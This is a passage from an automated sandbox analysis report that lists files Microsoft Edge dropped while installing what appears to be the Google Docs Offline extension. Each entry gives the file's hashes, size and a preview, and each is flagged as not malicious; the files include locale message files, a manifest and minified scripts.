SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11280
Entropy (8bit):	5.752941882424501
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuHEIIMuuqd7CKqvVpfcNLFev:m8IEI4u8ROxev
MD5:	F897300492E3AB467E56883D23D02D77
SHA1:	DECD6DC9E70ECCF9B45983147680614C019B99EA
SHA-256:	F9B3A5747DEDCB5AED58FCFC0F4FD3BD2F2E903F2CCEF90A92A73DBC0F8C3DBD
SHA-512:	B8AC574E24814BAF04A264E7F3F00B4285CD7B66104DFC77897440A898FCA5230775300EC7DEF723678975A04C2CD1BC73A44F77DA26262E8704029930990C62
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417781191647272
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1H9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APHgiVb
MD5:	35068E2550395A8A3E74558F2F4658DA
SHA1:	BD6620054059BFB7A27A4FFF86B9966727F2C2B9
SHA-256:	E2F418C816895E830541F48C0406B9398805E88B61A4EC816244154CD793743C
SHA-512:	4BCB971D7353648ABF25ACA7A4A4771F62BBB76F8FC13BDE886F29826D9314F5101942492004FC719493604D317958B63A95CF5173F8180214F27D6BEA303F97
Malicious:	false
Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3700)
Category:	dropped
Size (bytes):	95606
Entropy (8bit):	5.405749379350638
Encrypted:	false
SSDEEP:	1536:rFTnpa+88KmEfryTdXPVy0d8RZZ0Qk4CWbsnf29Gmyj9tIRRduRnCrl:almPXPVCFCWbsnDVQRwF0l
MD5:	9D0EF4F7CB0306DCB7A7CDCD6DC2CCC7
SHA1:	88D7F0A88C5807BFE00F13B612CC0522EEBE514A
SHA-256:	E5E4392B21A21ECAFD27707BF70F95961B2656735A20B40BA54479D40EAB063C
SHA-512:	34CD9AF9199DE606A531E98DB82BEAA5552E59BCCB2AB2BF49F82D6FA05425EB6936BC5F03BFC421AB6980B91395D9FDC5F0776882E1D49B3217CD35641FF906
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3705)
Category:	dropped
Size (bytes):	104595
Entropy (8bit):	5.385879258644142
Encrypted:	false
SSDEEP:	1536:CvBfoqPByzpq7Wj3X5GtH2n4JvHDxwKMpFs0vuFfkR/2oTnHu96Iny0Kj2ThzfS:BlXQtoZrs0vskDTHu9rhTS
MD5:	4E0C47897BF98DEAC56F800942E150C4
SHA1:	7903D30E0ACEE273724BDAA67446D9FD4E8460A5
SHA-256:	FE76EA0C2F81E6140F38F4143B40BE85014B93FF80737600CFB39AEB5C8C6537
SHA-512:	8B31463FC683439BAB5D4AEFE2BE0F6A9F5B695C2D95AFF3F842BFC74B10AE3D386D288121161506F74A08FB86D25C1096DA4177B768254BF84E83983982640F
Malicious:	false
Preview:	'use strict';function aa(){return function(){}}function k(a){return function(){return this[a]}}function ba(a){return function(){return a}}var n;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=ea(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");retu

C:\Users\user\AppData\Local\Temp\scoped_dir5528_968160063\4a0b6696-98b4-4ddb-8300-a05533ab40c2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
